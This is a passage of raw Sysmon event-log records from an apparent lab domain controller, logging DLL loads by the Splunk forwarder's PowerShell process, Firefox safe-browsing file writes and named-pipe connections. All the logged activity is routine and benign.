Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057350421Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.430{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x800000000000000057350420Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.429{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 11241100x800000000000000057350419Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.328{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057350418Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.328{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=620C9EEB202A05E231BCACEC9EA14627,SHA256=CD352A3C9AC2DF11258E061FE2B4544AC1CFEEBAC283538464743A531DD63BB1falsetrue 11241100x800000000000000057350417Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.244{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.vlpset2021-11-12 12:19:09.244 11241100x800000000000000057350416Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.244{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-twitter-digest256.sbstore2021-11-12 12:19:09.244 11241100x800000000000000057350415Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.244{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.vlpset2021-11-12 12:19:09.244 11241100x800000000000000057350414Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.244{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-linkedin-digest256.sbstore2021-11-12 12:19:09.244 11241100x800000000000000057350413Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.244{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.vlpset2021-11-12 12:19:09.244 11241100x800000000000000057350412Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.244{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-tracking-protection-facebook-digest256.sbstore2021-11-12 12:19:09.228 11241100x800000000000000057350411Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-track-digest256.vlpset2021-11-12 12:19:09.228 11241100x800000000000000057350410Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\social-track-digest256.sbstore2021-11-12 12:19:09.228 11241100x800000000000000057350409Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.vlpset2021-11-12 12:19:09.228 11241100x800000000000000057350408Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozstd-trackwhite-digest256.sbstore2021-11-12 12:19:09.228 11241100x800000000000000057350407Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozplugin-block-digest256.vlpset2021-11-12 12:19:09.228 11241100x800000000000000057350406Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\mozplugin-block-digest256.sbstore2021-11-12 12:19:09.228 734700x800000000000000057350405Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x800000000000000057350404Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862trueMicrosoft WindowsValid 734700x800000000000000057350403Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x800000000000000057350402Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057350401Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 11241100x800000000000000057350400Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto.vlpset2021-11-12 12:19:09.228 18141800x800000000000000057350399Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe 734700x800000000000000057350398Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValid 11241100x800000000000000057350397Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-22EA-6170-2B5F-01000000F101}5544C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\puywnvy0.default-release\safebrowsing-updating\google4\goog-unwanted-proto.metadata2021-11-12 12:19:09.227 734700x800000000000000057350396Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.228{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057350395Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.227{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057350394Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.227{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057350393Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057350392Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057350391Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057350390Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057350389Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057350388Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057350387Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057350386Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057350385Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057350384Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057350383Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057350382Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057350381Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 734700x800000000000000057350380Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057350379Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057350378Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057350377Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057350376Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057350375Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057350374Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057350373Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057350372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057350371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057350370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057350369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057350368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057350367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 10341000x800000000000000057350366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:19:09.207{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5BBD-618E-64F3-04000000F101}5916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 